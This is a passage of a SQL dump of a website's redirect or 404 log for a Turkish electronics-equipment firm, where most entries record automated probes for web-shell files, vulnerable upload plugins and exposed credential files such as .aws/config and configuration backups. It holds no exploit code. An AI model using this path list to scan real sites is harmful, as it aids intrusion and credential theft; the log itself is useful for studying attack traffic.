00:00:00',301),(29396,'http://mail.3s-technologies.com.tr/en/templates/beez3/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:20','0000-00-00 00:00:00',301),(29397,'http://mail.3s-technologies.com.tr/en/sites/default/files/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:21','0000-00-00 00:00:00',301),(29398,'http://mail.3s-technologies.com.tr/en/sites/default/files/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:21','0000-00-00 00:00:00',301),(29399,'http://mail.3s-technologies.com.tr/en/sites/default/files/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:22','0000-00-00 00:00:00',301),(29400,'http://mail.3s-technologies.com.tr/en/admin/controller/extension/extension/alfa_data',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:23','0000-00-00 00:00:00',301),(29401,'http://mail.3s-technologies.com.tr/en/admin/controller/extension/extension/alfacgiapi',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:23','0000-00-00 00:00:00',301),(29402,'http://mail.3s-technologies.com.tr/en/admin/controller/extension/extension/cgialfa',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:24','0000-00-00 00:00:00',301),(29403,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/ubh/up.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:51:34','0000-00-00 00:00:00',301),(29404,'http://mail.3s-technologies.com.tr/en/about.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:51:34','0000-00-00 00:00:00',301),(29405,'http://mail.3s-technologies.com.tr/en/shells.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:35','0000-00-00 00:00:00',301),(29406,'http://mail.3s-technologies.com.tr/en/olux.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:35','0000-00-00 00:00:00',301),(29407,'http://mail.3s-technologies.com.tr/en/xleet.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:36','0000-00-00 00:00:00',301),(29408,'http://mail.3s-technologies.com.tr/en/wso.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:37','0000-00-00 00:00:00',301),(29409,'http://mail.3s-technologies.com.tr/en/shell.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:38','0000-00-00 00:00:00',301),(29410,'http://mail.3s-technologies.com.tr/en/up.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:51:38','0000-00-00 00:00:00',301),(29411,'http://mail.3s-technologies.com.tr/en/upload.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:51:38','0000-00-00 00:00:00',301),(29412,'http://mail.3s-technologies.com.tr/en/x.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:51:40','0000-00-00 00:00:00',301),(29413,'http://mail.3s-technologies.com.tr/en/z.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:40','0000-00-00 00:00:00',301),(29414,'http://mail.3s-technologies.com.tr/en/a.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:40','0000-00-00 00:00:00',301),(29415,'http://mail.3s-technologies.com.tr/en/test.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:51:42','0000-00-00 00:00:00',301),(29416,'http://mail.3s-technologies.com.tr/en/wp.php',NULL,'www.bing.com','',4,0,'2022-06-08 13:51:42','0000-00-00 00:00:00',301),(29417,'http://mail.3s-technologies.com.tr/en/alfa.php',NULL,'www.bing.com','',5,0,'2022-06-08 13:51:42','0000-00-00 00:00:00',301),(29418,'http://mail.3s-technologies.com.tr/en/config.php',NULL,'www.bing.com','',6,0,'2022-06-08 13:51:43','0000-00-00 00:00:00',301),(29419,'https://www.3s-technologies.com.tr/en/akrilik-iåÿleme-acrylic-processing/akrilik-iåÿleme-acrylic-processing',NULL,'','',6,0,'2022-06-09 03:23:46','0000-00-00 00:00:00',301),(29420,'http://3s-technologies.com.tr/tr/assets/plugins/uploadify/uploadify.css',NULL,'','',2,0,'2022-06-09 05:48:55','0000-00-00 00:00:00',301),(29421,'https://3s-technologies.com.tr/tr/bc',NULL,'https://3s-technologies.com.tr/bc','',1,0,'2022-06-09 13:42:50','0000-00-00 00:00:00',301),(29422,'https://3s-technologies.com.tr/tr/style.php',NULL,'bing.com','',2,0,'2022-06-10 03:48:26','0000-00-00 00:00:00',301),(29423,'https://3s-technologies.com.tr/tr//wordpress//wp-admin/install.php?step=1',NULL,'bing.com','',1,0,'2022-06-10 03:48:30','0000-00-00 00:00:00',301),(29424,'https://3s-technologies.com.tr/tr//wordpress///wp-admin/setup-config.php',NULL,'bing.com','',1,0,'2022-06-10 03:48:32','0000-00-00 00:00:00',301),(29425,'https://3s-technologies.com.tr/tr///wp-admin/install.php?step=1',NULL,'bing.com','',1,0,'2022-06-10 03:48:35','0000-00-00 00:00:00',301),(29426,'https://3s-technologies.com.tr/tr////wp-admin/setup-config.php',NULL,'bing.com','',1,0,'2022-06-10 03:48:38','0000-00-00 00:00:00',301),(29427,'http://www.3s-technologies.com.tr/tr/shell4.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:16','0000-00-00 00:00:00',301),(29428,'http://www.3s-technologies.com.tr/tr/ups.php',NULL,'https://www.google.com','',19,0,'2022-06-10 05:43:17','0000-00-00 00:00:00',301),(29429,'http://www.3s-technologies.com.tr/tr/ru.php',NULL,'https://www.google.com','',18,0,'2022-06-10 05:43:19','0000-00-00 00:00:00',301),(29430,'http://www.3s-technologies.com.tr/tr/if.php',NULL,'https://www.google.com','',21,0,'2022-06-10 05:43:20','0000-00-00 00:00:00',301),(29431,'http://www.3s-technologies.com.tr/tr/vuln.php',NULL,'https://www.google.com','',19,0,'2022-06-10 05:43:22','0000-00-00 00:00:00',301),(29432,'http://www.3s-technologies.com.tr/tr/skipper.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:24','0000-00-00 00:00:00',301),(29433,'http://www.3s-technologies.com.tr/tr/skippershell.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:25','0000-00-00 00:00:00',301),(29434,'http://www.3s-technologies.com.tr/tr/tttt.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:26','0000-00-00 00:00:00',301),(29435,'http://www.3s-technologies.com.tr/tr/tshop.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:28','0000-00-00 00:00:00',301),(29436,'http://www.3s-technologies.com.tr/tr/inje3ctor.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:31','0000-00-00 00:00:00',301),(29437,'http://www.3s-technologies.com.tr/tr/saudi.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:32','0000-00-00 00:00:00',301),(29438,'http://www.3s-technologies.com.tr/tr/alfashell.php',NULL,'https://www.google.com','',20,0,'2022-06-10 05:43:35','0000-00-00 00:00:00',301),(29439,'http://www.3s-technologies.com.tr/tr/my_alfa.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:35','0000-00-00 00:00:00',301),(29440,'http://www.3s-technologies.com.tr/tr/uploader.php',NULL,'https://www.google.com','',20,0,'2022-06-10 05:43:37','0000-00-00 00:00:00',301),(29441,'http://www.3s-technologies.com.tr/tr/hacked.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:41','0000-00-00 00:00:00',301),(29442,'http://www.3s-technologies.com.tr/tr/c99.php',NULL,'https://www.google.com','',20,0,'2022-06-10 05:43:43','0000-00-00 00:00:00',301),(29443,'http://www.3s-technologies.com.tr/tr/priv8.php',NULL,'https://www.google.com','',21,0,'2022-06-10 05:43:45','0000-00-00 00:00:00',301),(29444,'http://www.3s-technologies.com.tr/tr/navir.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:46','0000-00-00 00:00:00',301),(29445,'http://www.3s-technologies.com.tr/tr/cmd13.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:46','0000-00-00 00:00:00',301),(29446,'http://www.3s-technologies.com.tr/tr/inc20k1.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:47','0000-00-00 00:00:00',301),(29447,'http://www.3s-technologies.com.tr/tr/404.php',NULL,'https://www.google.com','',42,0,'2022-06-10 05:43:50','0000-00-00 00:00:00',301),(29448,'http://www.3s-technologies.com.tr/tr/swm.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:43:51','0000-00-00 00:00:00',301),(29449,'http://www.3s-technologies.com.tr/tr/wp.php',NULL,'https://www.google.com','',46,0,'2022-06-10 05:43:52','0000-00-00 00:00:00',301),(29450,'http://www.3s-technologies.com.tr/tr/shx.php',NULL,'https://www.google.com','',18,0,'2022-06-10 05:43:53','0000-00-00 00:00:00',301),(29451,'http://www.3s-technologies.com.tr/tr/ws.php',NULL,'https://www.google.com','',30,0,'2022-06-10 05:43:54','0000-00-00 00:00:00',301),(29452,'http://www.3s-technologies.com.tr/tr/m.php',NULL,'https://www.google.com','',33,0,'2022-06-10 05:43:54','0000-00-00 00:00:00',301),(29453,'http://www.3s-technologies.com.tr/tr/edit-form.php',NULL,'https://www.google.com','',18,0,'2022-06-10 05:43:55','0000-00-00 00:00:00',301),(29454,'http://www.3s-technologies.com.tr/tr/leaf.php',NULL,'https://www.google.com','',57,0,'2022-06-10 05:43:57','0000-00-00 00:00:00',301),(29455,'http://www.3s-technologies.com.tr/tr/leafmailer.php',NULL,'https://www.google.com','',19,0,'2022-06-10 05:43:59','0000-00-00 00:00:00',301),(29456,'http://www.3s-technologies.com.tr/tr/mailer.php',NULL,'https://www.google.com','',22,0,'2022-06-10 05:44:00','0000-00-00 00:00:00',301),(29457,'http://www.3s-technologies.com.tr/tr/leafmailer2.8.php',NULL,'https://www.google.com','',18,0,'2022-06-10 05:44:04','0000-00-00 00:00:00',301),(29458,'http://www.3s-technologies.com.tr/tr/srx.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:44:10','0000-00-00 00:00:00',301),(29459,'http://www.3s-technologies.com.tr/tr/1337.php',NULL,'https://www.google.com','',22,0,'2022-06-10 05:44:10','0000-00-00 00:00:00',301),(29460,'http://www.3s-technologies.com.tr/tr/xx.php',NULL,'https://www.google.com','',30,0,'2022-06-10 05:44:11','0000-00-00 00:00:00',301),(29461,'http://www.3s-technologies.com.tr/tr/lf.php',NULL,'https://www.google.com','',22,0,'2022-06-10 05:44:12','0000-00-00 00:00:00',301),(29462,'http://www.3s-technologies.com.tr/tr/alex.php',NULL,'https://www.google.com','',22,0,'2022-06-10 05:44:14','0000-00-00 00:00:00',301),(29463,'http://www.3s-technologies.com.tr/tr/new.php',NULL,'https://www.google.com','',34,0,'2022-06-10 05:44:15','0000-00-00 00:00:00',301),(29464,'http://www.3s-technologies.com.tr/tr/marijuana.php',NULL,'https://www.google.com','',22,0,'2022-06-10 05:44:16','0000-00-00 00:00:00',301),(29465,'http://www.3s-technologies.com.tr/tr/gaza.php',NULL,'https://www.google.com','',19,0,'2022-06-10 05:44:18','0000-00-00 00:00:00',301),(29466,'http://www.3s-technologies.com.tr/tr/wp-admin.php',NULL,'https://www.google.com','',22,0,'2022-06-10 05:44:19','0000-00-00 00:00:00',301),(29467,'http://www.3s-technologies.com.tr/tr/wikindex.php',NULL,'https://www.google.com','',18,0,'2022-06-10 05:44:22','0000-00-00 00:00:00',301),(29468,'http://www.3s-technologies.com.tr/tr/wso1.php',NULL,'https://www.google.com','',19,0,'2022-06-10 05:44:24','0000-00-00 00:00:00',301),(29469,'http://www.3s-technologies.com.tr/tr/bb.php',NULL,'https://www.google.com','',24,0,'2022-06-10 05:44:25','0000-00-00 00:00:00',301),(29470,'http://www.3s-technologies.com.tr/tr/lux.php',NULL,'https://www.google.com','',17,0,'2022-06-10 05:44:26','0000-00-00 00:00:00',301),(29471,'http://www.3s-technologies.com.tr/tr/haxor.php',NULL,'https://www.google.com','',21,0,'2022-06-10 05:44:27','0000-00-00 00:00:00',301),(29472,'https://3s-technologies.com.tr/tr/?option=com_user&task=register',NULL,'','',9,0,'2022-06-10 11:13:11','0000-00-00 00:00:00',301),(29473,'https://3s-technologies.com.tr/tr/joomla/other-components/registration-form',NULL,'','',9,0,'2022-06-10 11:13:13','0000-00-00 00:00:00',301),(29474,'https://3s-technologies.com.tr/tr/?option=com_community&view=register',NULL,'','',9,0,'2022-06-10 11:13:20','0000-00-00 00:00:00',301),(29475,'https://3s-technologies.com.tr/tr/component/user/register.html',NULL,'','',9,0,'2022-06-10 11:13:22','0000-00-00 00:00:00',301),(29476,'https://3s-technologies.com.tr/tr/registration/registers',NULL,'','',9,0,'2022-06-10 11:13:23','0000-00-00 00:00:00',301),(29477,'https://3s-technologies.com.tr/tr/?option=com_secureregistration&task=register',NULL,'','',9,0,'2022-06-10 11:13:27','0000-00-00 00:00:00',301),(29478,'https://3s-technologies.com.tr/tr/?option=com_registration&task=register',NULL,'','',9,0,'2022-06-10 11:13:32','0000-00-00 00:00:00',301),(29479,'https://3s-technologies.com.tr/tr/?option=com_comprofiler&task=registers',NULL,'','',18,0,'2022-06-10 11:13:35','0000-00-00 00:00:00',301),(29480,'https://3s-technologies.com.tr/tr/?option=com_joocm&view=register',NULL,'','',9,0,'2022-06-10 11:13:38','0000-00-00 00:00:00',301),(29481,'https://3s-technologies.com.tr/tr/?option=com_easysocial&view=registration',NULL,'','',15,0,'2022-06-10 11:13:40','0000-00-00 00:00:00',301),(29482,'https://3s-technologies.com.tr/tr/?option=com_user&view=register',NULL,'','',9,0,'2022-06-10 11:13:44','0000-00-00 00:00:00',301),(29483,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2022-06-11 10:17:10','0000-00-00 00:00:00',301),(29484,'https://3s-technologies.com.tr/tr/configuration.php',NULL,'','',2,0,'2022-06-12 02:28:55','0000-00-00 00:00:00',301),(29485,'https://3s-technologies.com.tr/tr/configuration.php.bak',NULL,'','',2,0,'2022-06-12 02:28:56','0000-00-00 00:00:00',301),(29486,'https://3s-technologies.com.tr/tr/configuration.php.backup',NULL,'','',1,0,'2022-06-12 02:28:57','0000-00-00 00:00:00',301),(29487,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar',NULL,'','',3,0,'2022-06-12 06:52:45','0000-00-00 00:00:00',301),(29488,'https://3s-technologies.com.tr/components/com_sexypolling/vote.php',NULL,'joomla-server.local/index.php/component/search/','',1,0,'2022-06-13 09:14:45','0000-00-00 00:00:00',301),(29489,'http://3s-technologies.com.tr/tr/files/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-06-13 13:27:55','0000-00-00 00:00:00',301),(29490,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/am100-detail',NULL,'','',1,0,'2022-06-14 12:37:12','0000-00-00 00:00:00',301),(29491,'https://3s-technologies.com.tr/en/wp-signin.php?dizo&ping',NULL,'','',4,0,'2022-06-14 14:09:23','0000-00-00 00:00:00',301),(29492,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2-detail',NULL,'','',2,0,'2022-06-15 10:31:30','0000-00-00 00:00:00',301),(29493,'https://3s-technologies.com.tr/en/accesson.php',NULL,'','',10,0,'2022-06-17 01:38:16','0000-00-00 00:00:00',301),(29494,'https://3s-technologies.com.tr/upl.php',NULL,'','',4,0,'2022-06-17 08:56:28','0000-00-00 00:00:00',301),(29495,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2022-06-19 15:36:10','0000-00-00 00:00:00',301),(29496,'https://3s-technologies.com.tr/assets/colors/go.php',NULL,'','',3,0,'2022-06-20 08:48:07','0000-00-00 00:00:00',301),(29497,'http://3s-technologies.com.tr/tr/.aws',NULL,'','',1,0,'2022-06-20 14:18:40','0000-00-00 00:00:00',301),(29498,'http://3s-technologies.com.tr/tr/.aws/config',NULL,'','',1,0,'2022-06-20 14:18:42','0000-00-00 00:00:00',301),(29499,'http://3s-technologies.com.tr/tr/.config',NULL,'','',1,0,'2022-06-20 14:18:44','0000-00-00 00:00:00',301),(29500,'http://3s-technologies.com.tr/tr/config.json',NULL,'','',8,0,'2022-06-20 14:18:46','0000-00-00 00:00:00',301),(29501,'http://3s-technologies.com.tr/tr/debug/default/view?panel=config',NULL,'','',4,0,'2022-06-20 14:18:48','0000-00-00 00:00:00',301),(29502,'http://3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css',NULL,'','',3,0,'2022-06-20 14:46:50','0000-00-00 00:00:00',301),(29503,'https://3s-technologies.com.tr/en/assets/images/accesson.php',NULL,'','',17,0,'2022-06-21 00:39:35','0000-00-00 00:00:00',301),(29504,'http://3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php',NULL,'','',3,0,'2022-06-22 02:56:34','0000-00-00 00:00:00',301),(29505,'https://3s-technologies.com.tr/index3.php',NULL,'','',3,0,'2022-06-22 05:11:48','0000-00-00 00:00:00',301),(29506,'https://3s-technologies.com.tr/assets/colors/get.php',NULL,'','',3,0,'2022-06-23 02:44:55','0000-00-00 00:00:00',301),(29507,'https://3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',2,0,'2022-06-23 06:25:20','0000-00-00 00:00:00',301),(29508,'https://3s-technologies.com.tr/tr/assets/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',2,0,'2022-06-23 06:25:22','0000-00-00 00:00:00',301),(29509,'https://3s-technologies.com.tr/tr/assets/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',2,0,'2022-06-23 06:25:23','0000-00-00 00:00:00',301),(29510,'https://3s-technologies.com.tr/tr/phpformbuilder/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',2,0,'2022-06-23 06:25:25','0000-00-00 00:00:00',301),(29511,'http://3s-technologies.com.tr/tr/wp-content/plugins/jquery-html5-file-upload/readme.txt',NULL,'','',2,0,'2022-06-23 11:51:42','0000-00-00 00:00:00',301),(29512,'https://3s-technologies.com.tr/radio.php',NULL,'','',3,0,'2022-06-23 20:13:59','0000-00-00 00:00:00',301),(29513,'https://3s-technologies.com.tr/assets/images/s_e.php',NULL,'','',3,0,'2022-06-25 00:37:13','0000-00-00 00:00:00',301),(29514,'https://3s-technologies.com.tr/en/assets/images/moduless.php',NULL,'','',3,0,'2022-06-25 10:50:47','0000-00-00 00:00:00',301),(29515,'https://3s-technologies.com.tr/wp-includes/wp-class.php',NULL,'','',3,0,'2022-06-25 18:20:06','0000-00-00 00:00:00',301),(29516,'http://3s-technologies.com.tr/tr/wp-content/plugins/page-flip-image-gallery/upload.php',NULL,'','',3,0,'2022-06-26 15:26:18','0000-00-00 00:00:00',301),(29517,'https://3s-technologies.com.tr/en/wp-theme.php',NULL,'','',4,0,'2022-06-27 06:18:25','0000-00-00 00:00:00',301),(29518,'https://3s-technologies.com.tr/assets/images/search.php',NULL,'','',3,0,'2022-06-27 19:14:43','0000-00-00 00:00:00',301),(29519,'https://3s-technologies.com.tr/en/assets/colors/accesson.php',NULL,'','',4,0,'2022-06-28 09:28:21','0000-00-00 00:00:00',301),(29520,'http://3s-technologies.com.tr/environments/environment.ts',NULL,'','',1,0,'2022-06-29 03:07:48','0000-00-00 00:00:00',301),(29521,'https://3s-technologies.com.tr/environments/environment.ts',NULL,'','',1,0,'2022-06-29 03:07:48','0000-00-00 00:00:00',301),(29522,'https://3s-technologies.com.tr/assets/images/wp_wrong_datlib.php',NULL,'','',3,0,'2022-06-29 22:07:47','0000-00-00 00:00:00',301),(29523,'https://3s-technologies.com.tr/assets/images/accesson.php',NULL,'','',4,0,'2022-06-30 13:51:56','0000-00-00 00:00:00',301),(29524,'https://3s-technologies.com.tr/tr/jst10x.php?v36437=346548',NULL,'https://3s-technologies.com.tr/JST10x.php?v36437=346548','',1,0,'2022-06-30 19:34:57','0000-00-00 00:00:00',301),(29525,'https://3s-technologies.com.tr/tr/wp-coreutils.php?v36437=346548',NULL,'https://3s-technologies.com.tr/wp-coreutils.php?v36437=346548','',1,0,'2022-06-30 19:34:58','0000-00-00 00:00:00',301),(29526,'http://3s-technologies.com.tr/tr/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css',NULL,'','',2,0,'2022-06-30 21:29:38','0000-00-00 00:00:00',301),(29527,'https://3s-technologies.com.tr/en/moduless.php',NULL,'','',4,0,'2022-07-03 12:03:32','0000-00-00 00:00:00',301),(29528,'http://3s-technologies.com.tr/tr/wp-content/plugins/uploadify/readme.txt',NULL,'','',3,0,'2022-07-03 15:39:31','0000-00-00 00:00:00',301),(29529,'https://3s-technologies.com.tr/en/wp-content/plugins/apikey/apikey.php?test=1',NULL,'','',1,0,'2022-07-04 01:29:17','0000-00-00 00:00:00',301),(29530,'https://3s-technologies.com.tr/wp_wrong_datlib.php',NULL,'','',3,0,'2022-07-04 16:01:49','0000-00-00 00:00:00',301),(29531,'http://3s-technologies.com.tr/tr/wp-content/plugins/uploadify/includes/check.php',NULL,'','',1,0,'2022-07-05 07:01:04','0000-00-00 00:00:00',301),(29532,'http://3s-technologies.com.tr/environments/.credentials',NULL,'','',1,0,'2022-07-06 05:17:21','0000-00-00 00:00:00',301),(29533,'https://3s-technologies.com.tr/environments/.credentials',NULL,'','',1,0,'2022-07-06 05:17:22','0000-00-00 00:00:00',301),(29534,'http://3s-technologies.com.tr/tr/wp-content/plugins/ccslider/includes/upload.php',NULL,'','',2,0,'2022-07-06 10:10:45','0000-00-00 00:00:00',301),(29535,'http://www.3s-technologies.com.tr/en/en/home-en',NULL,'','',1,0,'2022-07-06 20:52:47','0000-00-00 00:00:00',301),(29536,'http://www.3s-technologies.com.tr/en/en/products-en',NULL,'','',1,0,'2022-07-06 20:52:47','0000-00-00 00:00:00',301),(29537,'http://www.3s-technologies.com.tr/en/en/videos',NULL,'','',1,0,'2022-07-06 20:52:48','0000-00-00 00:00:00',301),(29538,'http://www.3s-technologies.com.tr/en/en/about-us',NULL,'','',1,0,'2022-07-06 20:52:48','0000-00-00 00:00:00',301),(29539,'http://www.3s-technologies.com.tr/en/en/contacts',NULL,'','',1,0,'2022-07-06 20:52:48','0000-00-00 00:00:00',301),(29540,'http://www.3s-technologies.com.tr/en/en/',NULL,'','',1,0,'2022-07-06 20:52:48','0000-00-00 00:00:00',301),(29541,'http://www.3s-technologies.com.tr/en/en/products-en/cnc',NULL,'','',1,0,'2022-07-06 20:52:50','0000-00-00 00:00:00',301),(29542,'http://www.3s-technologies.com.tr/en/en/products-en/laser-marking-machine',NULL,'','',1,0,'2022-07-06 20:52:50','0000-00-00 00:00:00',301),(29543,'http://www.3s-technologies.com.tr/en/en/products-en/odd-shape-inserter',NULL,'','',1,0,'2022-07-06 20:52:50','0000-00-00 00:00:00',301),(29544,'http://www.3s-technologies.com.tr/en/en/products-en/thru-hole',NULL,'','',1,0,'2022-07-06 20:52:50','0000-00-00 00:00:00',301),(29545,'http://www.3s-technologies.com.tr/en/en/products-en/smd-ultra-hız',NULL,'','',1,0,'2022-07-06 20:52:51','0000-00-00 00:00:00',301),(29546,'http://www.3s-technologies.com.tr/en/en/products-en/smd-orta-hızlı',NULL,'','',1,0,'2022-07-06 20:52:51','0000-00-00 00:00:00',301),(29547,'http://www.3s-technologies.com.tr/en/en/products-en/smd-düşük-hızlı',NULL,'','',1,0,'2022-07-06 20:52:51','0000-00-00 00:00:00',301),(29548,'http://www.3s-technologies.com.tr/en/en/products-en/screen-printer',NULL,'','',1,0,'2022-07-06 20:52:51','0000-00-00 00:00:00',301),(29549,'http://www.3s-technologies.com.tr/en/en/products-en/smd-fırın',NULL,'','',1,0,'2022-07-06 20:52:51','0000-00-00 00:00:00',301),(29550,'http://www.3s-technologies.com.tr/en/en/products-en/dalga-lehim',NULL,'','',1,0,'2022-07-06 20:52:51','0000-00-00 00:00:00',301),(29551,'http://www.3s-technologies.com.tr/en/en/products-en/bölgesel-lehimleme',NULL,'','',1,0,'2022-07-06 20:52:52','0000-00-00 00:00:00',301),(29552,'http://www.3s-technologies.com.tr/en/en/products-en/temizleme-makineleri',NULL,'','',1,0,'2022-07-06 20:52:52','0000-00-00 00:00:00',301),(29553,'http://www.3s-technologies.com.tr/en/en/products-en/konveyorler',NULL,'','',1,0,'2022-07-06 20:52:52','0000-00-00 00:00:00',301),(29554,'http://www.3s-technologies.com.tr/en/en/pcb-prototip-prototyping',NULL,'','',1,0,'2022-07-06 20:52:52','0000-00-00 00:00:00',301),(29555,'http://www.3s-technologies.com.tr/en/en/wood-processing-ahşap-işleme',NULL,'','',1,0,'2022-07-06 20:52:53','0000-00-00 00:00:00',301),(29556,'http://www.3s-technologies.com.tr/en/en/akrilik-işleme-acrylic-processing',NULL,'','',1,0,'2022-07-06 20:52:53','0000-00-00 00:00:00',301),(29557,'http://www.3s-technologies.com.tr/en/en/aluminyum-işleme-aluminum-processing',NULL,'','',1,0,'2022-07-06 20:52:53','0000-00-00 00:00:00',301),(29558,'http://www.3s-technologies.com.tr/en/en/ahşap-işleme-wood-processing-120cm',NULL,'','',1,0,'2022-07-06 20:52:53','0000-00-00 00:00:00',301),(29559,'http://www.3s-technologies.com.tr/en/en/lead-free-solder',NULL,'','',1,0,'2022-07-06 20:52:54','0000-00-00 00:00:00',301),(29560,'http://www.3s-technologies.com.tr/en/en/wave-soldering',NULL,'','',1,0,'2022-07-06 20:52:54','0000-00-00 00:00:00',301),(29561,'http://www.3s-technologies.com.tr/en/en/pcb-productions-methods',NULL,'','',1,0,'2022-07-06 20:52:54','0000-00-00 00:00:00',301),(29562,'http://3s-technologies.com.tr/tr/zbilakntkhdame.php',NULL,'','',3,0,'2022-07-07 02:08:57','0000-00-00 00:00:00',301),(29563,'http://3s-technologies.com.tr/tr/am.php',NULL,'','',18,0,'2022-07-07 02:11:16','0000-00-00 00:00:00',301),(29564,'http://3s-technologies.com.tr/tr/blog/fw.php',NULL,'','',45,0,'2022-07-07 02:11:37','0000-00-00 00:00:00',301),(29565,'http://3s-technologies.com.tr/tr/fox.php',NULL,'','',96,0,'2022-07-07 02:12:20','0000-00-00 00:00:00',301),(29566,'http://3s-technologies.com.tr/tr/gel4y.php',NULL,'','',97,0,'2022-07-07 02:12:32','0000-00-00 00:00:00',301),(29567,'http://3s-technologies.com.tr/tr/gif.php',NULL,'','',21,0,'2022-07-07 02:12:37','0000-00-00 00:00:00',301),(29568,'http://3s-technologies.com.tr/tr/goods.php',NULL,'','',365,0,'2022-07-07 02:12:42','0000-00-00 00:00:00',301),(29569,'http://3s-technologies.com.tr/tr/images/about.php',NULL,'','',128,0,'2022-07-07 02:13:00','0000-00-00 00:00:00',301),(29570,'http://3s-technologies.com.tr/tr/images/sym.php',NULL,'','',12,0,'2022-07-07 02:13:06','0000-00-00 00:00:00',301),(29571,'http://3s-technologies.com.tr/tr/lab.php',NULL,'','',15,0,'2022-07-07 02:13:26','0000-00-00 00:00:00',301),(29572,'http://3s-technologies.com.tr/tr/leaf_mailer.php',NULL,'','',12,0,'2022-07-07 02:13:35','0000-00-00 00:00:00',301),(29573,'http://3s-technologies.com.tr/tr/leaf_php.php',NULL,'','',12,0,'2022-07-07 02:13:37','0000-00-00 00:00:00',301),(29574,'http://3s-technologies.com.tr/tr/mailer1.php',NULL,'','',12,0,'2022-07-07 02:14:06','0000-00-00 00:00:00',301),(29575,'http://3s-technologies.com.tr/tr/mari.php',NULL,'','',105,0,'2022-07-07 02:14:15','0000-00-00 00:00:00',301),(29576,'http://3s-technologies.com.tr/tr/ms.php',NULL,'','',93,0,'2022-07-07 02:14:28','0000-00-00 00:00:00',301),(29577,'http://3s-technologies.com.tr/tr/server.php',NULL,'','',35,0,'2022-07-07 02:15:36','0000-00-00 00:00:00',301),(29578,'http://3s-technologies.com.tr/tr/sh.php',NULL,'','',76,0,'2022-07-07 02:15:42','0000-00-00 00:00:00',301),(29579,'http://3s-technologies.com.tr/tr/tuco.php',NULL,'','',14,0,'2022-07-07 02:16:26','0000-00-00 00:00:00',301),(29580,'http://3s-technologies.com.tr/tr/w3llstore.php',NULL,'','',43,0,'2022-07-07 02:17:11','0000-00-00 00:00:00',301),(29581,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/fw.php',NULL,'','',12,0,'2022-07-07 02:17:19','0000-00-00 00:00:00',301),(29582,'http://3s-technologies.com.tr/tr/wp-admin/css/fw.php',NULL,'','',47,0,'2022-07-07 02:17:25','0000-00-00 00:00:00',301),(29583,'http://3s-technologies.com.tr/tr/wp-admin/includes/fw.php',NULL,'','',12,0,'2022-07-07 02:17:40','0000-00-00 00:00:00',301),(29584,'http://3s-technologies.com.tr/tr/wp-admin/maint/about.php',NULL,'','',236,0,'2022-07-07 02:17:45','0000-00-00 00:00:00',301),(29585,'http://3s-technologies.com.tr/tr/wp-admin/maint/fw.php',NULL,'','',12,0,'2022-07-07 02:17:49','0000-00-00 00:00:00',301),(29586,'http://3s-technologies.com.tr/tr/wp-admin/shell.php',NULL,'','',18,0,'2022-07-07 02:17:57','0000-00-00 00:00:00',301),(29587,'http://3s-technologies.com.tr/tr/wp-admin/x.php',NULL,'','',45,0,'2022-07-07 02:18:01','0000-00-00 00:00:00',301),(29588,'http://3s-technologies.com.tr/tr/wp-content/about.php',NULL,'','',286,0,'2022-07-07 02:18:10','0000-00-00 00:00:00',301),(29589,'http://3s-technologies.com.tr/tr/wp-content/wp.php',NULL,'','',48,0,'2022-07-07 02:18:23','0000-00-00 00:00:00',301),(29590,'http://3s-technologies.com.tr/tr/wp-content/x.php',NULL,'','',40,0,'2022-07-07 02:18:25','0000-00-00 